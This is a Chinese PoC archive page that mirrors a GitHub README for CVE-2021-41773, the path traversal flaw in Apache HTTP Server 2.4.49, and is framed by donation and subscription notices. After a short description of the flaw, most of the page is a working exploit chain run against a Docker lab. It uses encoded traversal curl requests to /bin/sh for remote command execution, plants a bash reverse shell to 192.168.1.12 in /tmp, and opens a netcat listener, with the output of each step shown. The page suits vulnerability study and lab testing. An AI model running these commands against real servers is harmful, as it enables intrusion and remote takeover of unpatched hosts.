目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1110

100%
请我们喝杯咖啡

CVE-2021-41773 PoC — Apache HTTP Server 路径遍历漏洞

来源
https://github.com/mightysai1997/CVE-2021-41773-L-
关联漏洞
标题:Apache HTTP Server 路径遍历漏洞 (CVE-2021-41773)
Description:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.4.49版本存在路径遍历漏洞,攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。
介绍
# CVE-2021-41773
## 🐛 Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.

If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.

This issue is known to be exploited in the wild.

This issue only affects Apache 2.4.49 and not earlier versions.

[source](https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-41773)

## Path Traversal
#### Overview
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).

This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.


## Proof Of Concept

### Set up the PoC environment

```
$ docker-compose build
$ docker-compose up
```

**Confirm it works**

```
$ curl http://localhost:1234
<html><body><h1>It works!</h1></body></html>
```

### Exploit

Victim : ``localhost:1234``  
Attacker : ``192.168.1.12``  

According to the documentation, this is a flaw that allows us to execute code on remote (RCE).  
We can exploit it by doing a curl with the cgi-bin folder.

```bash
$ curl 'http://<victim_ip>/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; <command>'
````

- **1. RCE**  
   Let's see if we actually have access to command, say ``id`` :
   ````bash
   $ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; id'
   uid=1(daemon) gid=1(daemon) groups=1(daemon)
   ````
- **2. Reverse shell**  
   We will test a reverse shell by creating a bash file on the victim's server.  
   Let's take as an example the reverse shell in bash found on the [PayloadsAllTheThings](https://github.com/LudovicPatho/PayloadsAllTheThings/) repo.  

   *Here is an example :*  
   [``bash -i >& /dev/tcp/10.0.0.1/4242 0>&1``](https://github.com/LudovicPatho/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp)   

   Let's create the file ``vuln.sh`` on the victim's machine in the ``/tmp/`` folder !  
   This file will contain our reverse shell that we can run remotely. It will connect to our local machine on port 44.  
   ````bash
   $  curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; echo "#!/bin/bash\nbash -i >& /dev/tcp/192.168.1.12/44 0>&1" > /tmp/vuln.sh'
   ````

   You can check the contents of the file with the ``cat`` command
   ````bash
   $ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:text/plain; echo; cat /tmp/vuln.sh'
   #!/bin/bash
   bash -i >& /dev/tcp/192.168.1.12/44 0>&1
  ````
- **3. Listener with ncat**  
   Let's create the listener on the local machine.
   ````bash
   $ nc -lvnp 44
   ````
   All that remains is to execute the remote file.
   ````bash
   $ curl 'http://localhost:1234/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type:
   text/plain; echo; bash /tmp/vuln.sh'
   ````

   Response :
   ````
   Ncat: Version 7.91 ( https://nmap.org/ncat )
   Ncat: Listening on :::44
   Ncat: Listening on 0.0.0.0:44
   Ncat: Connection from 172.19.32.1.
   Ncat: Connection from 172.19.32.1:58963.
   ````

## References
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://github.com/apache/httpd/commit/98246aa96079dad5f7b20521bbc0142a04f1c5e7
文件快照

 [4.0K]  /data/pocs/3e4cb347e5b1da1840039dfc24f03547a67f5aa5
├── [ 191]  docker-compose.yml
├── [  79]  Dockerfile
├── [ 20K]  httpd.conf
├── [ 11K]  LICENSE
└── [4.3K]  README.md

0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →